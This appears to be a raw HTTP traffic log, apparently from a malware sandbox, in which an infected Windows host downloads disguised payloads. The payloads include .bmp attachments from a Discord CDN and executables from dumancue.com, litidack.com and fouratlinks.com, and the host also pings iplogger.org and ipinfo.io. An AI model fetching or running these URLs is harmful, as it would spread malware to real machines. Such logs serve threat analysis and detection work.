{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oBAJzGi8dTBoI%2F31Kf5mCfkyKk1l0gOHVblQn8DKtVb6QRvdEQCFZcfSKnDNkm7HiRfgrN3eK%2BeIMyDNgvFrLzxavJ5GansOZ42F5u9szWqU2bqNpRXpKdMcnZoyCv6Nce0Msg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/891006172130345095/905393686618193921/help0301.bmp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: cdn.discordapp.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:27 GMT Content-Type: image/x-ms-bmp Content-Length: 390148 Connection: keep-alive CF-Ray: 6a91d78deac20f68-ICN Accept-Ranges: bytes Age: 137331 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=help0301.bmp ETag: "e24aaa8d072d4b39a37b7d0ac310be49" Expires: Sat, 05 Nov 2022 00:07:27 GMT Last-Modified: Wed, 03 Nov 2021 09:51:16 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1635933076334878 x-goog-hash: crc32c=wzJFvw== x-goog-hash: md5=4kqqjQctSzmje30KwxC+SQ== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 390148 X-GUploader-UploadID: ADPycdsXmOTNxdVhbL6qN3BmWaEC4mfyS9Y3xlk9Tyd7-cE2GU58Df4V8x4994eZCq_exTDRDOJJ8cDR9C5YtaOOpB4g0OWJ4A X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nzN67bwrc12qsVrYqDcBqRCDPCmnkcvQ3Wo1%2BJenhFpcHX2Dlq%2Bp3gnbkJblq%2BnXTNnGkCsYLAhGj0RTsD9lrPymQb%2BHaBQX%2FRRf6Bn2OdU%2FLFUsatAFhz%2B%2BxkLNspji7kri2A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/891006172130345095/905726625025511474/sloader0401.bmp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: cdn.discordapp.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:27 GMT Content-Type: image/x-ms-bmp Content-Length: 5453828 Connection: keep-alive CF-Ray: 6a91d78ee9240f88-ICN Accept-Ranges: bytes Age: 57559 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=sloader0401.bmp ETag: "00778de7b3c7ddb3b906a5d34dc98406" Expires: Sat, 05 Nov 2022 00:07:27 GMT Last-Modified: Thu, 04 Nov 2021 07:54:15 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1636012455146460 x-goog-hash: crc32c=e4IP7Q== x-goog-hash: md5=AHeN57PH3bO5BqXTTcmEBg== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 5453828 X-GUploader-UploadID: ADPycdu1ForXf3mYDfyiT2pcFSCwUB1Ap4gRhv7tFv5JqOO4WIMUNIrGq3QPXzVIDKbAyPDIHy5M6c_bbvxsCvHguKnOt8XIbA X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sI%2BlnDGYVKzAGVbITUdNlLilq2%2FVLwdYNe4kNIYt2e%2FFur%2BtKhFfZKVpPf5moLUz8r3AUkUpXZXqnRAaKmU6FZ5Rmx2MvBtoVuJbQwOHMzDerH0VA0ArbJeU1jrKNtVzLqgiew%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/891006172130345095/905750415910514738/5780_0401.bmp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: cdn.discordapp.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:28 GMT Content-Type: image/x-ms-bmp Content-Length: 593412 Connection: keep-alive CF-Ray: 6a91d7922b456183-ICN Accept-Ranges: bytes Age: 52429 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=5780_0401.bmp ETag: "837a41d93e768faf1d590537621e8252" Expires: Sat, 05 Nov 2022 00:07:28 GMT Last-Modified: Thu, 04 Nov 2021 09:28:47 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1636018127226662 x-goog-hash: crc32c=GGonVw== x-goog-hash: md5=g3pB2T52j68dWQU3Yh6CUg== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 593412 X-GUploader-UploadID: ADPycdse1gxmJRBpy2LGORhd2yljYgBKlsNI_i_fikySaRzcCHkRuzqNAgrK9r4g6fdigCYep8H2SfRK2xuplbz5Ng X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EGQOP%2BCoCTGoROWev1E9G7M4U2hhAXl9i5bo0p66MPXssqjsruZFLfqXmp%2FdMUl8VYoij9hCRxiRdC9eHDFTFErBrai6BvCpmJoHIlwpfF3WMIujGzwFqslENKBd7FDzx%2Fsdew%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /dd7c8e90c804f83b712eb175eb0daaef.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: dumancue.com Cache-Control: no-cache

HTTP/1.1 307 Temporary Redirect Date: Fri, 05 Nov 2021 00:07:30 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive location: https://litidack.com/af016c52b60489b5da52d037a2d6dd6b/dd7c8e90c804f83b712eb175eb0daaef.exe CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VvGsN76gTshtyWxMEpOUWJGcQF9fuGOysPxMIQyNBHLAS7A2N%2BT5TRSAVMMtqj2LOWpBup0JBOBshXr6Dnx5%2FlD%2FjdgDNl8W9iKwEe3KLScx6sxLy85PiyW54PL3v4A%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6a91d79c7f710ab6-KIX alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

GET /af016c52b60489b5da52d037a2d6dd6b/dd7c8e90c804f83b712eb175eb0daaef.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Connection: Keep-Alive Cache-Control: no-cache Host: litidack.com

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:32 GMT Content-Type: application/x-ms-dos-executable Content-Length: 4554792 Connection: keep-alive last-modified: Thu, 04 Nov 2021 23:42:51 GMT Cache-Control: max-age=14400 CF-Cache-Status: MISS Accept-Ranges: bytes Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7vmbQOC8St0yoZpfoemXA2q5fpSmeMrLvXniqIPv4CrFSxi9REY%2FwjGPKIbFzdns9V7fVLKdtcy9f8TOzc0fEc%2FolLAWuEk3ld7F8L8v0kslZa9UHG9Ff9FPBRRYpLM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6a91d7a48a08aed3-KIX alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

GET /attachments/893177342426509335/905791554113912932/uglinesses.jpg HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:33 GMT Content-Type: image/jpeg Content-Length: 655159 Connection: keep-alive CF-Ray: 6a91d7b40abb0f70-ICN Accept-Ranges: bytes Age: 41396 Cache-Control: public, max-age=31536000 ETag: "d935391d51aa6298ace628ca0d6d1dd4" Expires: Sat, 05 Nov 2022 00:07:33 GMT Last-Modified: Thu, 04 Nov 2021 12:12:15 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Cf-Bgj: h2pri Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1636027935372164 x-goog-hash: crc32c=oNG1aQ== x-goog-hash: md5=2TU5HVGqYpis5ijKDW0d1A== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 655159 X-GUploader-UploadID: ADPycdvkBa3IR-5_aZ0JJNfp_knvtmkDpbiTF4mjgZPhFD_avKH3jao0RZdf1j9s_HmCpzDg6r62b5L4tZRcEoxRpVA X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LZGcfe2Cu%2BuwugSjKgt2RT211y02BjkOPtmG7BM9yvlW5TE9J9My1XbWu3qiIXV6PjsFsoERMvh3uGd%2Bl0Vg8GOQLUFin48S02T0kHP%2F0annAElNhn8EGIKIhMGvWCuKqbGvvw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: yandex.ru

HTTP/1.1 200 Ok Accept-CH: Viewport-Width, DPR, Device-Memory, RTT, Downlink, ECT Accept-CH-Lifetime: 31536000 Cache-Control: no-cache,no-store,max-age=0,must-revalidate Content-Security-Policy: report-uri https://csp.yandex.net/csp?project=morda&from=morda.big.ru&showid=1636070854.79569.85728.577338&h=stable-morda-sas-yp-163&yandexuid=4546107721636070854&&version=2021-11-02-1&adb=0;child-src passport.yandex.ru yandex.ru yastatic.net 'self' blob: zen.yandex.ru awaps.yandex.net yandexadexchange.net *.yandexadexchange.net storage.mds.yandex.net *.yandex.ru banners.adfox.ru yastat.net mc.yandex.ru mc.yandex.md passport.yandex.ru;script-src 'nonce-CLSfg+1iE6pm9t9GMtElwQ==' mc.yandex.com zen-yandex-ru.cdnclab.net yastatic.net yandex.ru 'self' an.yandex.ru z.moatads.com storage.mds.yandex.net zen.yandex.ru yandex.st mc.yandex.ru banners.adfox.ru ads.adfox.ru ads6.adfox.ru yastat.net *.mc.yandex.ru adstat.yandex.ru;connect-src *.cdn.ngenix.net *.strm.yandex.net auto.ru blob: favicon.yandex.net log.strm.yandex.ru mc.yandex.com thequestion.ru www.kinopoisk.ru zen-yandex-ru.cdnclab.net yandex.ru yastatic.net yastat.net 'self' portal-xiva.yandex.net wss://portal-xiva.yandex.net strm.yandex.ru mobile.yandex.net yabs.yandex.ru an.yandex.ru verify.yandex.ru *.verify.yandex.ru mc.yandex.ru yandex.st matchid.adfox.yandex.ru adfox.yandex.ru ads.adfox.ru ads6.adfox.ru jstracer.yandex.ru awaps.yandex.ru tps.doubleverify.com pixel.adsafeprotected.com wss://webasr.voicetech.yandex.net zen.yandex.ru *.mediascope.mc.yandex.ru *.strm.yandex.ru frontend.vh.yandex.ru wss://push.yandex.ru awaps.yandex.net *.mc.yandex.ru adstat.yandex.ru mc.admetrica.ru;img-src *.verify.yandex.ru auto.ru strm.yandex.net thequestion.ru www.kinopoisk.ru zen-yandex-ru.cdnclab.net 'self' yastatic.net data: yandex.ru resize.yandex.net *.strm.yandex.net strm.yandex.ru avatars-fast.yandex.net favicon.yandex.net banners.adfox.ru content.adfox.ru ads6.adfox.ru yastat.net avatars.mds.yandex.net mc.yandex.ru *.tns-counter.ru verify.yandex.ru ads.adfox.ru bs.serving-sys.com ad.adriver.ru wcm.solution.weborama.fr wcm-ru.frontend.weborama.fr mc.admetrica.ru ad.doubleclick.net rgi.io track.rutarget.ru ssl.hurra.com px.moatads.com amc.yandex.ru gdeby.hit.gemius.pl tps.doubleverify.com pixel.adsafeprotected.com impression.appsflyer.com yabs.yandex.ru zen.yandex.ru s3.mds.yandex.net zen.s3.yandex.net *.mediascope.mc.yandex.ru tns-counter.ru storage.mds.yandex.net an.yandex.ru awaps.yandex.net awaps.yandex.ru gdero.hit.gemius.pl pixel.adlooxtracking.com mc.yandex.com *.mc.yandex.ru adstat.yandex.ru;style-src 'unsafe-inline' yastatic.net zen.yandex.ru yandex.st banners.adfox.ru content.adfox.ru yastat.net;media-src *.cdn.ngenix.net blob: *.strm.yandex.net *.yandex.net strm.yandex.ru *.strm.yandex.ru yastat.net data: yandex.ru yandex.st yastatic.net banners.adfox.ru content.adfox.ru;default-src yastatic.net yastat.net zen.yandex.ru awaps.yandex.net awaps.yandex.ru;font-src yastatic.net zen.yandex.ru an.yandex.ru yastat.net data: 'self';object-src avatars.mds.yandex.net Content-Type: text/html; charset=UTF-8 Date: Fri, 05 Nov 2021 00:07:34 GMT Expires: Fri, 05 Nov 2021 00:07:35 GMT Last-Modified: Fri, 05 Nov 2021 00:07:35 GMT NEL: {"report_to": "network-errors", "max_age": 86400, "success_fraction": 0.001, "failure_fraction": 0.1} P3P: policyref="/w3c/p3p.xml", CP="NON DSP ADM DEV PSD IVDo OUR IND STP PHY PRE NAV UNI" Report-To: { "group": "network-errors", "max_age": 86400, "endpoints": [ { "url": "https://dr.yandex.net/nel"}]} Set-Cookie: yp=1638662855.ygu.1; Expires=Mon, 03-Nov-2031 00:07:34 GMT; Domain=.yandex.ru; Path=/ Set-Cookie: mda=0; Expires=Sat, 05-Mar-2022 00:07:34 GMT; Domain=.yandex.ru; Path=/ Set-Cookie: yandex_gid=10635; Expires=Sun, 05-Dec-2021 00:07:34 GMT; Domain=.yandex.ru; Path=/ Set-Cookie: yandexuid=4546107721636070854; Path=/; Domain=.yandex.ru; Expires=Mon, 03-Nov-2031 00:07:34 GMT; Secure Set-Cookie: is_gdpr=0; Path=/; Domain=.yandex.ru; Expires=Sun, 05 Nov 2023 00:07:34 GMT Set-Cookie: is_gdpr_b=COaIGBCTTygC; Path=/; Domain=.yandex.ru; Expires=Sun, 05 Nov 2023 00:07:34 GMT Set-Cookie: _yasc=agJF+YVKoJPu5272ivALIPGUkilFpwhrRvoYIZXqIpI/zGSK; domain=.yandex.ru; path=/; expires=Sun, 05-Dec-2021 00:07:34 GMT; secure Set-Cookie: i=mC31qOSIsZFEeIiSpxxbUlrmQXhXzV7lqE5HPF7QgjQYdqIz5ZALvvWkOs3pONSocVLSAwO17VnNKmGm6O4HG/W3Y/c=; Expires=Sun, 05-Nov-2023 00:07:34 GMT; Domain=.yandex.ru; Path=/; Secure; HttpOnly Strict-Transport-Security: max-age=31536000; includeSubDomains Transfer-Encoding: chunked X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Requestid: 1636070854.79569.85728.577338 X-Yandex-Req-Id: 1636070854757621-15562047315954610772-man1-0358-331-man-l7-balancer-8080-BAL-8747

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: yandex.ru

HTTP/1.1 200 Ok Accept-CH: Viewport-Width, DPR, Device-Memory, RTT, Downlink, ECT Accept-CH-Lifetime: 31536000 Cache-Control: no-cache,no-store,max-age=0,must-revalidate Content-Security-Policy: media-src *.cdn.ngenix.net blob: *.strm.yandex.net *.yandex.net strm.yandex.ru *.strm.yandex.ru yastat.net data: yandex.ru yandex.st yastatic.net banners.adfox.ru content.adfox.ru;script-src 'nonce-gaS0T6ZzO/FkHWN5zpN5tA==' mc.yandex.com zen-yandex-ru.cdnclab.net yastatic.net yandex.ru 'self' an.yandex.ru z.moatads.com storage.mds.yandex.net zen.yandex.ru yandex.st mc.yandex.ru banners.adfox.ru ads.adfox.ru ads6.adfox.ru yastat.net *.mc.yandex.ru adstat.yandex.ru;child-src passport.yandex.ru yandex.ru yastatic.net 'self' blob: zen.yandex.ru awaps.yandex.net yandexadexchange.net *.yandexadexchange.net storage.mds.yandex.net *.yandex.ru banners.adfox.ru yastat.net mc.yandex.ru mc.yandex.md passport.yandex.ru;img-src *.verify.yandex.ru auto.ru strm.yandex.net thequestion.ru www.kinopoisk.ru zen-yandex-ru.cdnclab.net 'self' yastatic.net data: yandex.ru resize.yandex.net *.strm.yandex.net strm.yandex.ru avatars-fast.yandex.net favicon.yandex.net banners.adfox.ru content.adfox.ru ads6.adfox.ru yastat.net avatars.mds.yandex.net mc.yandex.ru *.tns-counter.ru verify.yandex.ru ads.adfox.ru bs.serving-sys.com ad.adriver.ru wcm.solution.weborama.fr wcm-ru.frontend.weborama.fr mc.admetrica.ru ad.doubleclick.net rgi.io track.rutarget.ru ssl.hurra.com px.moatads.com amc.yandex.ru gdeby.hit.gemius.pl tps.doubleverify.com pixel.adsafeprotected.com impression.appsflyer.com yabs.yandex.ru zen.yandex.ru s3.mds.yandex.net zen.s3.yandex.net *.mediascope.mc.yandex.ru tns-counter.ru storage.mds.yandex.net an.yandex.ru awaps.yandex.net awaps.yandex.ru gdero.hit.gemius.pl pixel.adlooxtracking.com mc.yandex.com *.mc.yandex.ru adstat.yandex.ru;style-src 'unsafe-inline' yastatic.net zen.yandex.ru yandex.st banners.adfox.ru content.adfox.ru yastat.net;connect-src *.cdn.ngenix.net *.strm.yandex.net auto.ru blob: favicon.yandex.net log.strm.yandex.ru mc.yandex.com thequestion.ru www.kinopoisk.ru zen-yandex-ru.cdnclab.net yandex.ru yastatic.net yastat.net 'self' portal-xiva.yandex.net wss://portal-xiva.yandex.net strm.yandex.ru mobile.yandex.net yabs.yandex.ru an.yandex.ru verify.yandex.ru *.verify.yandex.ru mc.yandex.ru yandex.st matchid.adfox.yandex.ru adfox.yandex.ru ads.adfox.ru ads6.adfox.ru jstracer.yandex.ru awaps.yandex.ru tps.doubleverify.com pixel.adsafeprotected.com wss://webasr.voicetech.yandex.net zen.yandex.ru *.mediascope.mc.yandex.ru *.strm.yandex.ru frontend.vh.yandex.ru wss://push.yandex.ru awaps.yandex.net *.mc.yandex.ru adstat.yandex.ru mc.admetrica.ru;report-uri https://csp.yandex.net/csp?project=morda&from=morda.big.ru&showid=1636070855.03766.97786.592724&h=prestable-morda-vla-yp-212&yandexuid=4007445901636070855&&version=2021-11-02-1&adb=0;default-src yastatic.net yastat.net zen.yandex.ru awaps.yandex.net awaps.yandex.ru;font-src yastatic.net zen.yandex.ru an.yandex.ru yastat.net data: 'self';object-src avatars.mds.yandex.net Content-Type: text/html; charset=UTF-8 Date: Fri, 05 Nov 2021 00:07:35 GMT Expires: Fri, 05 Nov 2021 00:07:35 GMT Last-Modified: Fri, 05 Nov 2021 00:07:35 GMT NEL: {"report_to": "network-errors", "max_age": 86400, "success_fraction": 0.001, "failure_fraction": 0.1} P3P: policyref="/w3c/p3p.xml", CP="NON DSP ADM DEV PSD IVDo OUR IND STP PHY PRE NAV UNI" Report-To: { "group": "network-errors", "max_age": 86400, "endpoints": [ { "url": "https://dr.yandex.net/nel"}]} Set-Cookie: yp=1638662855.ygu.1; Expires=Mon, 03-Nov-2031 00:07:35 GMT; Domain=.yandex.ru; Path=/ Set-Cookie: mda=0; Expires=Sat, 05-Mar-2022 00:07:35 GMT; Domain=.yandex.ru; Path=/ Set-Cookie: yandex_gid=10635; Expires=Sun, 05-Dec-2021 00:07:35 GMT; Domain=.yandex.ru; Path=/ Set-Cookie: yandexuid=4007445901636070855; Path=/; Domain=.yandex.ru; Expires=Mon, 03-Nov-2031 00:07:35 GMT; Secure Set-Cookie: is_gdpr=0; Path=/; Domain=.yandex.ru; Expires=Sun, 05 Nov 2023 00:07:35 GMT Set-Cookie: is_gdpr_b=COaIGBCTTygC; Path=/; Domain=.yandex.ru; Expires=Sun, 05 Nov 2023 00:07:35 GMT Set-Cookie: _yasc=KRFvcaiqtf8Xl1WW6hUFruakoxjAxEg6XpnnSa+T1hl0KrxL; domain=.yandex.ru; path=/; expires=Sun, 05-Dec-2021 00:07:35 GMT; secure Set-Cookie: i=w6xiFqkTm7TdAJFkJCGO4ZHqJMsyBCSy5Oz6IU9mzthbN/Z/2+m/vhACCtdnv8GuZ8UCBqShH73845dQCImzmXkGMSE=; Expires=Sun, 05-Nov-2023 00:07:35 GMT; Domain=.yandex.ru; Path=/; Secure; HttpOnly Strict-Transport-Security: max-age=31536000; includeSubDomains Transfer-Encoding: chunked X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Requestid: 1636070855.03766.97786.592724 X-Yandex-Req-Id: 1636070855002240-17596764995700744590-man1-3974-man-l7-balancer-8080-BAL-1108

GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 Host: www.listincode.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx Date: Fri, 05 Nov 2021 00:07:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2 Connection: keep-alive X-Powered-By: PHP/5.6.40 Access-Control-Allow-Origin: *

GET /1GWfv7 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 Host: iplogger.org Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx Date: Fri, 05 Nov 2021 00:07:38 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=u41802e04gs63crm8c3keqp791; path=/; HttpOnly Pragma: no-cache Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=242977333; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:01 GMT Answers: whoami: 2545b4ccbc3d20c553c5c74e8fab8603327ecdc0f45cc13358586ab2a94d337e Strict-Transport-Security: max-age=31536000; preload X-Frame-Options: DENY

GET /widget HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: ipinfo.io

HTTP/1.1 200 OK access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin content-type: application/json; charset=utf-8 content-length: 876 date: Fri, 05 Nov 2021 00:07:39 GMT x-envoy-upstream-service-time: 20 vary: Accept-Encoding Via: 1.1 google Alt-Svc: clear

GET /widget HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: ipinfo.io

HTTP/1.1 200 OK access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin content-type: application/json; charset=utf-8 content-length: 876 date: Fri, 05 Nov 2021 00:07:40 GMT x-envoy-upstream-service-time: 16 vary: Accept-Encoding Via: 1.1 google Alt-Svc: clear

HEAD /installpartners/ShareFolder.exe HTTP/1.1 Accept: */* User-Agent: InnoDownloadPlugin/1.5 Host: fouratlinks.com Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:05:41 GMT Server: Apache Last-Modified: Thu, 04 Nov 2021 13:35:16 GMT ETag: "a0a00-5cff698cc8d00" Accept-Ranges: bytes Content-Length: 657920 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program

GET /installpartners/ShareFolder.exe HTTP/1.1 Accept: */* User-Agent: InnoDownloadPlugin/1.5 Host: fouratlinks.com Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:05:42 GMT Server: Apache Last-Modified: Thu, 04 Nov 2021 13:35:16 GMT ETag: "a0a00-5cff698cc8d00" Accept-Ranges: bytes Content-Length: 657920 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: application/x-msdos-program

GET /stockmerchandise/zillaCPM/r4XZt5MYHpEdcdmzqr2D.exe HTTP/1.1 Host: fouratlinks.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:05:56 GMT Server: Apache Last-Modified: Mon, 01 Nov 2021 16:41:58 GMT ETag: "59a00-5cfbcdaf76180" Accept-Ranges: bytes Content-Length: 367104 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program

GET /stockmerchandise/serious_punch_upd/HttpTwcyK3R6gQj7t7EY.exe HTTP/1.1 Host: fouratlinks.com

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:06:04 GMT Server: Apache Last-Modified: Mon, 01 Nov 2021 16:08:48 GMT ETag: "88400-5cfbc645a6400" Accept-Ranges: bytes Content-Length: 558080 Content-Type: application/x-msdos-program

GET /stockmerchandise/total_out_hand/v8hBqWuKscbjZRqNatPw.exe HTTP/1.1 Host: fouratlinks.com

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:06:07 GMT Server: Apache Last-Modified: Tue, 02 Nov 2021 17:44:35 GMT ETag: "37600-5cfd1d8c48dbe" Accept-Ranges: bytes Content-Length: 226816 Content-Type: application/x-msdos-program

GET /Widgets/FolderShare.exe HTTP/1.1 Host: fouratlinks.com

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:06:09 GMT Server: Apache Last-Modified: Mon, 27 Sep 2021 13:36:56 GMT ETag: "bc800-5ccfa30ca2e00" Accept-Ranges: bytes Content-Length: 772096 Content-Type: application/x-msdos-program

POST /xenocrates/zoroaster HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: requestimedout.com Content-Length: 180 Expect: 100-continue Accept-Encoding: gzip Connection: Keep-Alive

HTTP/1.1 100 Continue

GET / HTTP/1.1 Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:06:15 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=ISO-8859-1 P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2021-11-05-00; expires=Sun, 05-Dec-2021 00:06:15 GMT; path=/; domain=.google.com; Secure Set-Cookie: NID=511=tl2MPmU5mbdRidhUbu17NjjRJCitvd2V5Ozx7hNj6O9lgD_wcYkksblfoS89-CxjJ9DaAdfkyMRujT2MJHHZy6ZDuXAMm1Zc2ZqyRQSA9GcGLAr8pexsdzdTMbWr7EEnBIaLugpM6Dw1bH4--faiO_4i-jDe6-FLsroRvS9lhc4; expires=Sat, 07-May-2022 00:06:15 GMT; path=/; domain=.google.com; HttpOnly Accept-Ranges: none Vary: Accept-Encoding Transfer-Encoding: chunked

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

